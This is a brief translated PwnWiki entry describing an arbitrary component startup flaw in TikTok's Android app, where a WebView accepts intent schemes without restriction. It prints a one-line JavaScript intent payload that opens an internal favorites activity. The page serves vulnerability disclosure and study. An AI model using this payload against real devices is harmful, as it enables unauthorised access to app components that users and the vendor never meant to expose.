Android version of TikTok arbitrary component startup vulnerability

From PwnWiki
This page is a translated version of the page 安卓版TikTok 任意組件啓動漏洞 and the translation is 100% complete.
Other languages:
Bahasa Indonesia • ‎Chinese • ‎English

The good news is that Add Wiki Activity WebView also supports intent schemes without any restrictions. But if the following code is executed in Add Wiki Activity, User Favorites Activity will be called.

location.replace("intent:#Intent;component=com.zhiliaoapp.musically/com.ss.android.ugc.aweme.favorites.ui.UserFavoritesActivity;package=com.zhiliaoapp.musically;action=android.intent.action.VIEW;end;")